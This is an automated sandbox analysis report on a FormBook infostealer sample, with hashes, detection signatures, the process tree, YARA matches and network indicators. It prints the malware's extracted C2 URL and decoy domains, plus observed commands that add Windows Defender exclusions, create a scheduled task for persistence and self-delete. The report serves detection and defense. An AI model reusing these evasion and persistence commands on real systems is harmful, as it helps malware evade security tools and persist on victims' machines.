Loading ...

Play interactive tourEdit tour

Analysis Report Ms5nQdSz5l.exe

Overview

General Information

Sample Name:Ms5nQdSz5l.exe
Analysis ID:404105
MD5:ba01df16e4c876e078348fd4479a8fdf
SHA1:6c7f20976d3e7d9bf9f8a410cbc54962d1ef52bb
SHA256:8353e30c6566795da3e5aa38a22b4707ee895cfa115ffa399cfbe7d57d00f91d
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Non Interactive PowerShell
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Ms5nQdSz5l.exe (PID: 3560 cmdline: 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: BA01DF16E4C876E078348FD4479A8FDF)
    • powershell.exe (PID: 6188 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6208 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6268 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Ms5nQdSz5l.exe (PID: 6452 cmdline: C:\Users\user\Desktop\Ms5nQdSz5l.exe MD5: BA01DF16E4C876E078348FD4479A8FDF)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.Ms5nQdSz5l.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.Ms5nQdSz5l.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.Ms5nQdSz5l.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        9.2.Ms5nQdSz5l.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.Ms5nQdSz5l.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' , ParentImage: C:\Users\user\Desktop\Ms5nQdSz5l.exe, ParentProcessId: 3560, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', ProcessId: 6188

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Ms5nQdSz5l.exeVirustotal: Detection: 26%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Ms5nQdSz5l.exeJoe Sandbox ML: detected
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Ms5nQdSz5l.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Ms5nQdSz5l.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Ms5nQdSz5l.exe, 00000009.00000003.243388587.0000000000F30000.00000004.00000001.sdmp, mstsc.exe, 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Ms5nQdSz5l.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.kelurahanpatikidul.xyz/op9s/
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.4980057280880200.xyz
          Source: global trafficHTTP traffic detected: GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1Host: www.safifinancial.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1Host: www.safifinancial.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.safifinancial.info
          Source: powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.
          Source: powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmpString found in binary or memory: http://crl.microszt
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.439791337.00000000048F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmpString found in binary or memory: http://vbcity.com/forums/t/51894.aspx
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmpString found in binary or memory: https://github.com/MrCylops
          Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000003.361866562.00000000052D1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: Ms5nQdSz5l.exe, 00000000.00000002.242851987.0000000001380000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139A20 NtResumeThread,LdrInitializeThunk,
